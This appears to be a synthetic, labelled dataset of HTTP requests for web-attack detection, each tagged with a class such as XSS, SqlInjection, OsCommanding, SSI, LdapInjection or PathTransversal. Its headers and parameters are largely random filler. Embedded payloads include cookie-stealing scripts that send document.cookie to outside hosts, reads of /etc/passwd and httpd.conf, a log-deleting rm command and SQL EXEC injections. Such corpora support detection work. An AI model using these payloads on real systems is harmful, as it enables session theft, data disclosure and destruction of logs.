If-Unmodified-Since: Wed, 28 Nov 07 13:09:17 GMT
If-Match: *
If-None-Match: "aArLISgjwm7L9c4IRDy"
If-Range: Mon, 10 Jan 05 24:27:15 UTC
Max-Forwards: 1
MIME-Version: 0.1
Pragma: no-cache
Proxy-Authorization: Basic Z25peXFzaDpld3NkcnA=
Authorization: Digest nc=d7bc844A
Range: -96373
Referer: http://offh.de/tctiehy/f1fc/rcioeto.avi
TE: chunked
Trailer: Trailer
User-Agent: wSE7zEniit
UA-CPU: Sparc
UA-Disp: 011,9897,16
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 7262x7113
Via: 4.8 88.241.245.135:24, 8.1 108.187.220.135:5
Transfer-Encoding: gzip
Upgrade: rlwdd/8.0, wre/1.9, b3o/6.7
Warning: 267 www.otmR1ir.htm "emnzR" "Mon, 09 Jun 08 08:56:30 UTC"
X-Forwarded-For: 139.160.46.245
X-Serial-Number: 8565701730547644653
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38399
Start - Id: 37530
class: LdapInjection
PUT /sKswRFOCC-z.F/hlteceaasbOrdOsrc/7f/onsxeaKtt4ul/MH/0pCeliboObetweentuE_f59/ie8oaO/eIh8-icp0OR/mrd/pZWxIF3ypVoF/ft0sejrv0a.js? HTTP/1.1
Content-Length: 209
Content-Language: wot6s
Content-Encoding: identity
Content-Location: http://aauue.gov/7pole/eush/nsmuh/ol3nnh18/g2rmrort.css
Content-MD5: RW1vbm9pZ2VDY2Nvc2VqcA==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 11 Nov 06 16:11:07 UTC
Last-Modified: Sat, 16 Feb 08 01:51:48 UTC
Host: 70.124.229.76
Connection: tjssh
Accept: */*
Accept-Charset: x-mac-hebrew
Accept-Encoding: gzip;q=0.7, compress
Accept-Language: brjte-aeyaantr;q=0.9, isHk-hstrpbe, itk-th6nswf, t4Tmat-veA;q=0.1
Cache-Control: only-if-cached
Client-ip: 133.128.23.213
Cookie: r73SokHQ8r=5;tehiy8hEtqe= yg ;a9s8tr7Lnnceq=6
Cookie2: $Version="192"
Date: Fri, 05 Oct 07 01:21:07 GMT
ETag: "HOTEkKcls_TWgyg7hA"
Expect: 100-continue
From: nIt1h@rvrs.org
If-Modified-Since: Thu, 23 Sep 04 03:54:05 UTC
If-Unmodified-Since: Tue, 19 Feb 08 21:48:39 CET
If-Match: *
If-None-Match: *
If-Range: Tue, 06 Jan 04 11:55:55 CET
Max-Forwards: 844
MIME-Version: 9.7
Pragma: no-cache
Proxy-Authorization: rertml hneO5=eocht
Authorization: Digest nonce
Range: 0516-7855,069180-,334-
Referer: /AulE.jsp
TE: chunked
Trailer: Expect
User-Agent: eiieaDtnua (lbrv_rxdrd; lSHiHEr; c-C9rLkU7; hZ-yY2K; gbR64MIE)
UA-CPU: MIPS
UA-Color: color32
UA-Pixels: 523x786
Via: 5.0 www.ssres.js, lSa6/2.2 242.132.221.129, dxwrlr/0.6 227.190.149.12
Transfer-Encoding: vltTj; slHnobo=ta87
Upgrade: 6ciYs/4.5, tUt/0.1, hmo/8.6, HPozai/2.7, 4rIvIy/9.5
Warning: 162 www.befnhlc.css "osea53nrTepho" 
X-Serial-Number: 749091
----: ----------------
~~~~~: ~~~~~~~~~~

mdCadiAToiHei=nraelhdOoo$0e6$d&ainine=$positiont&&nFx9Pv3=3620254&ftdoehumsnlu=tBcv&tsoy=a-tathetF0ra&Ceeedoe=25oot)( |    (ge=*)&ohtolatfwi7oc=suFy-&eerhltqwn=egktka&EsOhLcadsrnanKS=ink0di

End - Id: 37530
Start - Id: 47778
class: XSS
GET /e6cbiecrQcesttrndhg/x5eoil/epsskaulre.png?zsnIuhE=+lRqhnldesedn&td2qcAEdnh=3ell&foc9d=vyee0PeUfkrde6l&Eoo=otR.&CmtoteIk6aozSl=nnin5o+Ss3&t1We_C=%3C%21%5BCDATA%5B%3C%21--%5D%5D++%3E%3Cscript+++%3E%5Bdocument.location.replace++++%28%27http%3A%2F%2Fwww.tima.com%2Fcgi-bin%2Fsilenillnd.cgi%27%2Bdocument.cookie%29%3B%5D%2F%2F--%3E%3C%2Fscript+%3E&ha9hth=6&rea=a%40Icn&coTom=21&kGx=igi8dtoi HTTP/1.0
Host: 149.167.241.239
Connection: close
Accept: audio/*, application/zip
Accept-Charset: *
Accept-Encoding: gzip
Accept-Language: fduA-rio
Cache-Control: auksx=a4
Client-ip: 225.168.147.79
Cookie: rEngrlqaoanEte=I7i5w;dnais3r8C0isd=718475645;mti9itog7=servicesoptssami7al@tecopyue&feA
Cookie2: $Version="49"
Date: Sat, 01 Sep 07 06:19:06 UTC
ETag: "je8fephf4ma2RiJO"
Expect: tese=ojdN1;xeEsf
From: ychumrg@eeAsehi.cz
If-Modified-Since: Fri, 02 Sep 05 23:28:25 UTC
If-Unmodified-Since: Thu, 03 Dec 09 20:04:53 GMT
If-Match: "RoRP6P46gnywWNY.S"
If-None-Match: *
If-Range: Fri, 09 May 08 03:24:48 GMT
Max-Forwards: 4
MIME-Version: 9.4
Pragma: no-cache
Proxy-Authorization: ynhmte fnet1=f4tno
Authorization: Digest nonce
Range: 2672-661117
Referer: http://aomt1kui.be/lnTxftnk/3Edt9l/tyusps.jsp
TE: chunked,deflate;q=0.4,deflate
Trailer: Accept-Language
User-Agent: or5oNhihtt/5.8.7.6
UA-CPU: PowerPC
UA-Disp: 1153,3781,32
UA-OS: Win98
UA-Color: color16
UA-Pixels: 2539x540
Via: HTTP/8.5 102.113.247.240, HTTP/3.9 www.tszqtl.gif, FTP/8.5 244.191.101.15
Transfer-Encoding: identity
Upgrade: ioe/1.5, oaei/8.3, ehtv/0.6
Warning: 289 www.y4tieh.html:6480 "Sn3nNaak3avt" "Sun, 06 Sep 09 14:49:12 CET"
X-Forwarded-For: 208.82.57.120
X-Serial-Number: 47690533150312984482
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47778
Start - Id: 42912
class: OsCommanding
PUT /sKVRAgF2ITIox@O@/lO2ls4v.P/yo/m3ssUmi9onra8ho/yoeoeyk-5249k/yjka-yu_6t.tiff? HTTP/1.1
Content-Length: 217
Content-Language: nrrtrte,oo5a3,lne
Content-Encoding: deflate
Content-Location: /ns20dnyh/endeo0e/ro0pasle/ieecnnn/doAcfsas.mpeg
Content-MD5: YmltdFhldHIybmhsQnJlbw==
Content-Type: application/x-www-form-urlencoded
Last-Modified: Thu, 06 Sep 07 20:21:29 GMT
Host: 178.103.249.39:8
Connection: close
Accept: image/jpeg;q=0.4
Accept-Charset: *;q=0.0
Accept-Encoding: deflate, compress;q=0.5
Accept-Language: *
Cookie: whomeH@VnetcatwinntGltmail=| dir ..\\..\\..\\..\\..\\..\\..\\,;sdaodhoevt=gutdN
Date: Sun, 17 Apr 05 21:35:43 UTC
ETag: "2OVh1b7c0DIraMM_kpH_"
Expect: pD6i3q=3wh8;s6nnh=wurs2e
From: Iz5wiue@ihgtomsrt.org
If-Match: "8PzFCFeypWN8dFjGWZNw"
Max-Forwards: 59
Pragma: o3='jtolires'
Referer: http://www.tdEtn.gov/nNNl/grzsi4/h6sw/aess6.js
TE: deflate;q=0.2
User-Agent: eo9JD6hG http://www.eTr5hh.it
UA-Disp: 396,1774,16
Warning: 934 27.166.230.175 "ihchdory3y2jeiAsp" 
X-Serial-Number: 3858497298557

igte=61124386&mrootdoirI=(t&mrtredaptoxcn=adhsh&ntA8f8ruyottftr=94149750&edk3=06742486&Xsq9s=90492438&xj=itdpise&ggOQhomei2AkCautoexec=etcida&Rik3fr=[x&tlstndzhu9=89&R2.all=hR1Mths&phrnttttre=So-e:eY=iwhereSfR

End - Id: 42912
Start - Id: 38795
class: LdapInjection
GET /iaSqTht.mdb?eiienhed=V%3Ae+&GVqY=opNdf3we&rhnsb=44609889&inodH=wndr+%3Eil+da&xeeitpUlo=rSextsmlAd&eie=en_5WCt&tcaxf3egckfs=6&aielliae=ies15eilupBfpaAb&bpT7eBCb3ZF8=nneo%2740eAd&oise9lhamrliesm=dt++%40&ro5nRsh7=9&yFaicD=i5e&ukeheVksegw=%29%28+%7C+%28qn%3Djhu*%29 HTTP/1.1
Host: 210.104.156.198:80
Connection: okeEwTh
Accept: */*;q=0.7
Accept-Charset: iso-10646-ucs-2;q=0.2, big5;q=0.1, macintosh;q=0.7, iso-8859-7
Accept-Encoding: gzip
Accept-Language: lnlbto-extzh1;q=0.4
Cache-Control: m='selae6E'
Client-ip: 239.52.8.232
Cookie: tloinprm=489226132;tasltmNaLm=2;7lbI8aMnsciub=oC8r8uBPkX8
Cookie2: $Version="40"
Date: Mon, 14 Feb 05 19:51:21 CET
ETag: W/"DA.H@49u-0brJTD"
Expect: 100-continue
From: Nrt0ttsL@rnpbsgro.fr
If-Modified-Since: Fri, 18 Mar 05 23:59:33 CET
If-Unmodified-Since: Sat, 28 Jul 07 06:14:27 UTC
If-Match: "RkFGcU.C@_W9IEaAfrm"
If-None-Match: *
If-Range: Sun, 30 Oct 05 07:15:52 UTC
Max-Forwards: 7006
MIME-Version: 3.1
Pragma: no-cache
Proxy-Authorization: lnraO geepoll=oRsheku
Authorization: Digest opaque="tteLcI"
Range: 89831-,-364983
Referer: /eLA5loe.tar
TE: gzip;q=0.5,gzip;q=0.3
Trailer: User-Agent
User-Agent: Mozilla/2.8 (Windows; U; WinNT 7.2; vi-it; rv:4.0.8) Gecko/06603101
UA-CPU: StrongARM
UA-Disp: 754,7315,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 8161x590
Via: 7.3 3.128.75.251
Transfer-Encoding: cuaee
Upgrade: oorig/6.0, osraet/4.0
Warning: 212 www.fksOim.jpeg "e4IlyYStHnzI69Ure" "Sun, 09 Sep 07 14:33:28 CET"
X-Forwarded-For: 199.212.3.152
X-Serial-Number: 323337935267147
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38795
Start - Id: 39675
class: SSI
GET /a@/hanmd/lvadaA3heE8nce3gii/le/eFOAsI8c/y5FitT/lcsX6dXQE4awDscK_b/t-.html?ri9eyoyEewehro=t&Hxeht9wwhrra1=i&i6fnixalh3iaIi=bloedesaoy1wmanIey&nhtaidnoptphowC=iKn4&df9reimeHuol=iahp8pcmailrU%27&vneojp=%3C%21--++++%23include++++virtual%3D%22%2Fetc%2Fhttpd%2Fhttpd.conf%22++--%3E&ksReRso0=n3gF&xi=sX_Pa&l8c7nuClhrawh=65088296&OIPrrstp5reANih=803081 HTTP/1.1
Host: 56.255.210.195
Connection: oueSa
Accept: text/plain;q=0.3, audio/x-wav, video/*;q=0.8
Accept-Charset: *;q=0.2
Accept-Encoding: *;q=0.6
Accept-Language: *;q=0.2
Cache-Control: max-stale=9144
Client-ip: 17.56.25.243
Cookie: aoodqrhaTs=6384
Cookie2: $Version="57"
Date: Sun, 16 May 04 01:16:05 UTC
ETag: "MnC6RG5yCfdECDak"
Expect: 100-continue
From: odEootep@ltmngy.biz
If-Modified-Since: Sat, 23 Dec 06 07:02:01 UTC
If-Unmodified-Since: Sun, 09 May 04 23:21:20 CET
If-Match: *
If-None-Match: "lR-A7X_--x_5AiH"
If-Range: "xK1saFgGulzrQ2lzG4D4"
Max-Forwards: 7
MIME-Version: 9.9
Pragma: ettdi=ter
Proxy-Authorization: NTLM eGVkdGNhbzJhc2l3dHBjcGF0cndpcmMxdHNldGx1ZTBxZXRSbHVl
Authorization: Digest nc=bfF4DAEf
Range: 047-,52-2392,30343-939979
Referer: http://bco2l.it/mbou/trexyn.cgi
TE: chunked;q=0.7,chunked;q=0.4
Trailer: Upgrade
User-Agent: n2aheul (bSL5VBo)
UA-CPU: 68000
UA-Disp: 0266,938,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 726x074
Via: 2.0 21.233.60.202, FTP/3.7 26.203.213.23
Transfer-Encoding: identity
Upgrade: oos/3.5, rts/5.9, ns9lh/5.9, csOEa/6.4, tncn/0.3
Warning: 733 214.19.169.247 "I5ohianit" 
X-Forwarded-For: 166.133.168.205
X-Serial-Number: 919920115
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39675
Start - Id: 36197
class: PathTransversal
POST /q2WgBOjSYJ/t.ZLI-TI0W@-tF/ohl1Aa5oemajtea7wr/hZa4LeeuFe/swI-Pwhd3KlMEVL9H/leqLKRVy5Hj@fr/ZqF.1.WRQaYJ2hu.tiff? HTTP/1.1
Content-Length: 248
Content-Language: E,a,e
Content-Encoding: gzip
Content-Location: /1hoix5f/soao/naivsd/dWrE.php3
Content-MD5: ZXRvbmVoYUU3bWVodTBUYQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 24 Oct 05 09:03:52 UTC
Last-Modified: Mon, 11 Aug 08 19:58:57 CET
Host: www.satd4.st
Connection: keep-alive
Accept: */*;q=0.0
Accept-Charset: *;q=0.1
Accept-Encoding: 
Accept-Language: t-ehaxra;q=0.5, sD-nus;q=0.2, rh-rf;q=0.9, veto-jci;q=0.3, dnlt-phtcTo;q=0.0
Cache-Control: no-store
Cookie: rsnt=..\..\..\..\..\..\..\..\..\WINDOWS\system.ini;tgae9eUiegtomxo=ns+;1esAwriylsder=30039
Date: Wed, 30 Aug 06 15:02:06 GMT
ETag: W/"aFkEenV8oX_QAkQj"
Expect: ex1a
If-Unmodified-Since: Wed, 15 Mar 06 01:37:31 UTC
If-Match: "_ZlonZLm3s9tbn4"
If-None-Match: "cacaWA@OqODM5uqi"
If-Range: Sat, 30 Aug 08 13:04:16 GMT
Max-Forwards: 6987
Pragma: no-cache
Authorization: Digest response="bced572cCcD70782AE909469fDaE9CBe"
Range: 2-,903689-,0-
Referer: http://www.oeanDs.ch/r7ftheH5/raeheodi/hhjnn1h/dsol0ae/udzEnoS.nsf
User-Agent: thwiddeeoa
UA-CPU: x86
UA-OS: Win95
UA-Color: color32
Via: 2.6 254.114.76.132, cbmne/9.4 www.tctrl.html, 0.9 www.hhzteboe.jpeg
Transfer-Encoding: gzip
X-Forwarded-For: 197.230.118.145
----: --------------------------------

ndtroeio=5o3JNH3wL&JeYimglp-=a2wwaYMbYt&aib2cb6=adl2b8Otxhsw9ac&mledelroCnEose=Ninsert %= evalQig&lre3ireolto=59043303&slsozHnzin=djcN&bCt=25001390&uunee59tsYl1i=uo3B|reorfu&noiariadepj4u6=052392&daedpncq6iehnnf=81&8e=awdeRNbre;gdivmebiaql 

End - Id: 36197
Start - Id: 47478
class: XSS
GET /r9xe-/fciffaakcimm/Blog/@Ndelikej3Msreplacezcaesam/nsfvd0sH@./qH6lIVbypBi.t7No8D/hckKJekD...exe?uris7uniotot=nuhfe6mso%3BPEe&tAnt9ei9noi4d=oaNCeRmwui&ahdbnsxzon5fio=B6Geeec&nqrlReetac2ltt=7269&r1qhPQNo0=19061041&st=doto&6AgHdlded=51834690&gstcasehame=%3Clink+++rel++%3D++++%22stylesheet%22+href++++%3D+%22+++javascript%3A%5Bdocument.location.replace++++%28%27http%3A%2F%2Fwww.ieve.com%2Fcgi-bin%2Fle.cgi%27%2Bdocument.cookie%29%3B%5D%22++%3E HTTP/1.0
Host: www.tmken5.uk:80
Connection: rbcnzEZ1
Accept: */*;q=0.5
Accept-Charset: iso-10646-ucs-2;q=0.5
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 205.71.159.23
Cookie: R-58object=gC@MJ2;disetonzssa=iiifmno/ssTect
Cookie2: $Version="8"
Date: Wed, 24 Dec 08 09:51:06 UTC
ETag: W/"Q.aFiei1JBvNXi@"
Expect: 100-continue
From: ghun@e9ggr0ugra.com
If-Modified-Since: Mon, 12 Dec 05 12:32:05 GMT
If-Unmodified-Since: Fri, 17 Jun 05 16:03:33 CET
If-Match: *
If-None-Match: *
If-Range: Sun, 11 Jan 09 14:45:08 UTC
Max-Forwards: 8265
MIME-Version: 6.3
Pragma: moHet=othrsne
Proxy-Authorization: 6s4e rdvto=nzte
Authorization: jeobj itene=iembtoa
Range: 1-845224,09-
Referer: /c0ctsi.cfm
TE: trailers,trailers
Trailer: If-Match
User-Agent: aq2i8ot/3.9.7
UA-CPU: MIPS
UA-Disp: 2372,1267,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 747x653
Via: oms/7.3 32.49.73.1, FTP/7.8 www.ncTcot4d.html
Transfer-Encoding: CNRcI; teee=segcn0ot
Upgrade: rshhh0/1.3
Warning: 265 126.167.150.154 "eE3Hb" "Thu, 11 Oct 07 04:38:57 UTC"
X-Forwarded-For: 166.174.206.86
X-Serial-Number: 48112496441051
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47478
Start - Id: 48020
class: XSS
GET /uf3fANyivRg72FRoC.js?AeY1pc2e=SyHisOtre7e1+&httpblPbstdin=eoi%25%5C&6ssoxosesEsoezl=%3Clink+rel+++%3D%22++++stylesheet++++%22+++++href+++%3D+%22javascript%3A++++%5Bwindow.open%28%27http%3A%2F%2F164.171.46.31%2Fra.exe%27%2Bdocument.cookie%29%3B%5D+++++%22++%3E&wha=7EaeixueBt%40&3hhnnS=siy+Iw&sssntsal=7reoOot&trrwkooN8=799 HTTP/1.1
Host: www.aimtij8.com:80
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: min-fresh=36601
Client-ip: 229.36.28.9
Cookie: czvsitf=o8TDmG;9aTlrhsi=xmlselecto8nMcehdw;0i11=e5;aeorj=1562012
Cookie2: $Version="114"
Date: Wed, 30 Dec 09 09:22:55 CET
ETag: W/"3x8koRullY4pvrSR5ZMs"
Expect: aVnq
From: uesois@ewrsoxtt.it
If-Modified-Since: Mon, 07 Feb 05 03:17:30 CET
If-Unmodified-Since: Sat, 22 Sep 07 11:24:24 UTC
If-Match: "SJV5JT00eWtcq0Pwh"
If-None-Match: "iqwEhKo9ppbJH0qznJ4F"
If-Range: *
Max-Forwards: 9140
MIME-Version: 4.1
Pragma: aattdd='lxqu'
Proxy-Authorization: uedrde k86eh=jiih
Authorization: rle3 gRndxit=ooe0
Range: 3837-2
Referer: http://www.Gaeht6ea.uk/dhRI3obo/aNto8wl2/8pemUlat/puyiers/devr.html
TE: deflate,deflate;q=0.8
Trailer: Referer
User-Agent: rtgiea2E (hkL1zYNh; tOoXXX; nTJdG_5; h5bZqaIa; nVmsTAeu)
UA-CPU: 68000
UA-Disp: 212,5646,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 0874x138
Via: en2d/1.2 60.18.128.168, 9.3 www.yehutti.js, 7.2 189.247.182.5:050
Transfer-Encoding: tena
Upgrade: DUyx4/6.1, udlo5/7.2
Warning: 237 106.180.134.229 "4e4socieooaey" "Fri, 14 Dec 07 11:55:14 UTC"
X-Forwarded-For: 177.208.72.84
X-Serial-Number: 698729021
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 48020
Start - Id: 38794
class: LdapInjection
GET /cepsvo0sfM-/Itoua6s3e1ou7Imduas/nyh8Lxl/vlxvegroup byAZPU2locationfKP/irJSg/dKsR92/0v4Ireds/ouecsk/vuM.0includeus/iiyR/ppOEtEtjea.bin?ectn2ineif=%29++++%28++++%7C+++%28VHQ%3Dt9*%29&HGxzA=zTyZxp&V6wbT=a1Ll%40&SZJsock_streamrtmpL0j=kt5cn5&oeebna=98470&optUZMb9Y=tUK0viF&ylo=+ue8&haCmocha=Nrmetaasddtl&oe4re=9018 HTTP/1.1
Host: 123.216.204.186
Connection: eoennt
Accept: audio/basic, application/*
Accept-Charset: shift_jis, hz-gb-2312;q=0.6, macintosh;q=0.2
Accept-Encoding: deflate
Accept-Language: lnlbto-extzh1;q=0.4
Cache-Control: m='selae6E'
Client-ip: 239.52.8.232
Cookie: tloinprm=489226132;tasltmNaLm=2;7lbI8aMnsciub=oC8r8uBPkX8
Cookie2: $Version="40"
Date: Tue, 12 May 09 07:23:33 GMT
ETag: W/"DA.H@49u-0brJTD"
Expect: 100-continue
From: Nrt0ttsL@rnpbsgro.fr
If-Modified-Since: Fri, 18 Mar 05 23:59:33 CET
If-Unmodified-Since: Thu, 24 Nov 05 23:42:41 CET
If-Match: "RkFGcU.C@_W9IEaAfrm"
If-None-Match: "okc8KM6wvIcKZBMueRM"
If-Range: Sun, 30 Oct 05 07:15:52 UTC
Max-Forwards: 7
MIME-Version: 3.1
Pragma: no-cache
Proxy-Authorization: lnraO geepoll=oRsheku
Authorization: Basic eTR0b2k6b2dyZQ==
Range: 89831-,-364983
Referer: http://www.fft74oE.uk/coaIabtp.jsp
TE: gzip;q=0.5,gzip;q=0.3
Trailer: User-Agent
User-Agent: Mozilla/5.7 (compatible; MSIE 6.8; Windows NT; woacnrheE)
UA-CPU: StrongARM
UA-Disp: 754,7315,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 8161x590
Via: 7.3 3.128.75.251
Transfer-Encoding: cuaee
Upgrade: sffo/2.2
Warning: 757 214.136.112.103 "ie6uit3rtiiPirtc" "Mon, 03 Oct 05 02:38:07 UTC"
X-Forwarded-For: 199.212.3.152
X-Serial-Number: 323337935267147
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38794
Start - Id: 43330
class: OsCommanding
GET /Ebslnhoooas0/iKZ.nApQ0HDpfwXbO/uXGoxf0H_hIHBGQW/0aanegehos8ho/buvarhVh2o/yguhk23esAnasp0e.sh?piiIrnewmymae=0lr5%29fromfi&opttAnyc=tB9Y&jUDetcdropWL-null=ehlNJvX.Mr&oNsri0ehhl4og=173&opensamDkz1PmetaS235=rwp-sh&hen6enriz=41634694&tsdnbuodElnh=os&nHninod0ejn=317&MaYNA=%250arm+++-f++%2Fvar%2Flog%2Fhttpd%2Faccess_log%3B&oonAtf=%7E%28g-jahaccepti6Etiaxng&eEtiidbtnt=5181&euiMior=6&oaa=842 HTTP/1.0
Host: 20.49.159.46
Connection: qn2s
Accept: video/*;q=0.8
Accept-Charset: x-mac-arabic, euc-cn, windows-1255
Accept-Encoding: *
Accept-Language: o-lmmtnc5;q=0.0, gh-eGoT;q=0.9, msI-omm;q=0.4
Cache-Control: no-store
Client-ip: 75.113.125.44
Cookie: leaXEn=-7;SfasooVhriel=frtcoOErh5radmeo;ievr=755535
Cookie2: $Version="66"
Date: Thu, 27 Sep 07 09:54:03 CET
ETag: W/"y4mXqvzLGmUzprT"
Expect: 100-continue
From: aDiswue@0eroLdeg.uk
If-Modified-Since: Mon, 25 Oct 04 08:33:40 GMT
If-Unmodified-Since: Tue, 11 Mar 08 20:53:38 GMT
If-Match: "rvwbc0oViTX.ORIfY37"
If-None-Match: "DWw.YUKULzc6nWyb"
If-Range: Fri, 27 Nov 09 09:39:35 UTC
Max-Forwards: 0
MIME-Version: 7.9
Pragma: no-cache
Proxy-Authorization: NTLM b2ZsaTZkVHVubWVyOTQ4YVFhdWVpc2RZbWFsc3ppaWR4V2VldHdobnJlZQ==
Authorization: Basic c2llc2Vzem86Ym5zaWxlbw==
Range: -3
Referer: http://www.nnetn9.org/gtsYb/qmmum5uo.gif
TE: trailers,trailers,gzip
Trailer: Via
User-Agent: Mozilla/0.2 (Machintosh; U; PPC Mac OS X 5.1; es-eo; rv:9.4.0) Gecko/60327954
UA-CPU: 68000
UA-Disp: 260,218,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 105x8065
Via: 2.7 234.49.214.176, 8.2 www.vir8g.css
Transfer-Encoding: deflate
Upgrade: EC4/0.8, cEeq/4.6, ezga1/4.0, sop/3.8, d63oen/6.6
Warning: 736 www.zmeftdme.shtml:69 "oNaciecieersUyiosal" 
X-Forwarded-For: 115.149.203.202
X-Serial-Number: 356926769417178111
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43330
Start - Id: 36364
class: PathTransversal
GET /lFnucJ8TSZL@WvewQ/vIOJGRconnectyO/oXrToxvuk5W/tasSir0oeieaqt/vgJghww9/gQVPx/4gnsmmd/oalwlt/uqvRm5Zn/d@wpMn70OhdlT79ng/to2deb/hRIpSo.asp?eena=1V6Yb6r&tc=748&uni=okWgroup+by&y.Am6foc1binputD=oebirbgsoundoNdelete&4i=300985&nQuniondIU=3&etcZ-Y8QejxcZ=a%24&n6pct=fdesheM7%26etns%5Dl&tm7-FopenPUA8LM=E%3CtkscriptmyBl6+o&ahnl6swysiset=we&0am7lXAeeie=pYuJ1z3Jm&LSykftp2cldL6N=m0efhewfd5oaapy&4eeeeci=%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2Fetc%5C%2Fpasswd%2500.html&taxt4mleSs=o&Heg=%7Ey59di+zq HTTP/1.1
Host: www.tgruna.be
Connection: close
Accept: */*
Accept-Charset: windows-1252, windows-1258
Accept-Encoding: compress, compress, identity
Accept-Language: *
Cache-Control: max-age=3645
Client-ip: 225.122.67.50
Date: Wed, 20 Aug 08 19:48:53 GMT
If-Modified-Since: Sat, 11 Dec 04 06:30:37 GMT
If-Unmodified-Since: Sun, 13 Nov 05 11:07:16 UTC
If-Match: "OwKsHnWAkpJ4JA7OlqHX"
If-None-Match: "y1lqHipScwAWmmXK3WN."
If-Range: "EHTH6Uo7iPx7W8RuV"
Max-Forwards: 4
Pragma: 53ixhOkg='agome'
Authorization: rraoiq yszdnbe=SEvzf
Range: -184,-23118,-675
Referer: http://sxtao.be/IaxeDtt.exe
Trailer: Via
User-Agent: Mozilla/3.4 (Windows; U; Win98 1.8; n6-5e; rv:8.3.7) Gecko/66089393
Transfer-Encoding: gzip
X-Serial-Number: 1125183

null

End - Id: 36364
Start - Id: 35072
class: SqlInjection
PUT /ob.shtml? HTTP/1.0
Content-Length: 240
Content-Language: Lsn1,eti
Content-Encoding: gzip
Content-Location: /isun/ehdeurpl/aoiDBuE/nn9nk.cfm
Content-MD5: dDhlY2lyOUhyaWx0cGFnZw==
Content-Type: application/x-www-form-urlencoded
Host: www.o6fdhj.it
Connection: rtoRe
Accept: */*
Accept-Charset: *;q=0.8
Accept-Encoding: compress;q=0.5
Accept-Language: d8-bjhmnf;q=0.9, imhyve-tieen;q=0.4, ee-azri1
Cache-Control: no-store
Client-ip: 2.36.20.75
Cookie: BEWgnc=4728309338;oriS=';  EXEC    master.dbo.sp_makewebtask   'c:\inetpub\wwwroot\edli.css',   'SELECT     smmhxa     FROM    aapik   WHERE     xtype=''U''';XQz-VhttpP7=4;hPjS7extHconnectkz=pXlVFE8
Date: Sun, 03 Sep 06 13:19:29 UTC
ETag: "roXId-xess9P3xh"
Expect: riotet9b
If-None-Match: "W0wzngEJwQnXEf6"
If-Range: *
Pragma: no-cache
Authorization: Digest username="rdinai"
Range: -186,-3
Referer: /xao5m/orioqi9u/onin9uEe/ksNeQMn.css
User-Agent: hiPa4I7 http://www.aeeptqe.de
UA-Disp: 3365,766,32
Via: iuer/7.9 www.rtls.tiff
Transfer-Encoding: efslth; anhhai=begaoo

eaadTr5ea7lv1e=69&arKhrdm8=iM4hTy&metqAoedree=ltite\~ue@8wA=&kratks7=004246441&ubncD3Ee=o2dx&eGuqltweoe=8558&ltes4h=evPIKhC&raforl6Msneierr=5323333912&nr3swneaola=1342128&ehdd7ees9=c&&oss=ai&rnpsnknig=++cY4)i&di6iEolmufi=sna

End - Id: 35072
Start - Id: 42073
class: SqlInjection
GET /sSc4siTwkc/mmhlWaeisfEmujt/wlSnfnmiwhsg36l/rosRa/EaOicwhcrvNoen5e/ik_V/kHtXSVp/sEqd4ir/oPkIG/kunGy/o5a9vA9o-g/afMdz-dZfoe6Nv7.tiff?iflj=nIbCCvlphO&t1693ohrfrotjhv=m6fho%29Hn&w_OSLK=733&mereedsj=%3B+++EXEC%28+%27INS%27%2B%27ERT+++INTO++++users+++++values%28616%2C%27ebr%27%2C%27doDazEe2t%27++++%29%29&giIno=665&h7onthMiTx7b=Iost2&l4rcnnRAbydWt=22644312&sicnad=32623&zgogy=3 HTTP/1.1
Host: www.ierlen8tB.uk
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: *;q=0.0
Accept-Encoding: identity, gzip, deflate;q=0.8, deflate;q=0.3, compress
Accept-Language: *;q=0.6
Cache-Control: max-age=0336
Client-ip: 18.205.184.49
Cookie: r0ssdklo=e window.openboot.inigroup by;eotd2rekltbc==a
Cookie2: $Version="76"
Date: Mon, 13 Mar 06 24:06:41 GMT
ETag: "1pNrCI08loZx0@fmb"
Expect: dntttuy
From: mwetzo8a@ourctd.net
If-Modified-Since: Tue, 16 Mar 04 03:30:05 CET
If-Unmodified-Since: Tue, 02 Oct 07 22:49:22 UTC
If-Match: "WZChvulT.sOUImsYO"
If-None-Match: *
If-Range: *
Max-Forwards: 3725
MIME-Version: 0.9
Pragma: ehcpre='rreelpxe'
Proxy-Authorization: Basic ZXRhb2llOm9ZN2lJ
Authorization: Basic YTFmZm46bmhuaWti
Range: 54-40255,-926,-098
Referer: http://www.Ccbi.it/nonere/7eITe2t/qae1rNqd/nenn7.ace
TE: trailers,trailers,trailers
Trailer: Range
User-Agent: 4twb (6_h5xlq)
UA-CPU: Sparc
